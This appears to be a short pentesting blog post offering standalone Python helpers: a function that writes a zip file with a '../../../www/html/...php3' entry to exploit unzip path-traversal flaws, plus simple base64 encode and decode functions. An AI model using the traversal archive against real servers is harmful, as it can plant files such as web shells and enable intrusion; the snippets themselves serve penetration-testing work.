Snippets: standalone py zip and base64 functions

Sometimes while writing pentest scripts, we need to write quick-and-dirty functions to attack certain vulns. Here are some of them.

Create zip files

Create zip files with relative paths to exploit unzip traversal vulns:

# Note: copy the function into the script

def create_zip():
    from zipfile import ZipFile
    with ZipFile('payload.zip', 'w') as f:
        # CHANGEME change the paths written
        f.writestr('../../../www/html/foo/bar/baz.php3', 'hello pwn')

if __name__ == '__main__':
    create_zip()

Convert to Base64

Converts a string to Base64:

# Note: copy the function into the script

def to_base64(ascii_text):
    import base64
    return base64.b64encode(ascii_text.encode('ascii')).decode('ascii')

if __name__ == '__main__':
    print(to_base64("hello"))

Convert from Base64

Converts a string from Base64:

def from_base64(base64_text):
    import base64
    return base64.b64decode(base64_text).decode('ascii')

if __name__ == '__main__':
    print(from_base64("aGVsbG8="))

Some other articles you might like

• Postgres SQL Injection to RCE with archive_command
• Room Writeup: Network Services
• Recap: JWT and Cookies for Web Authentication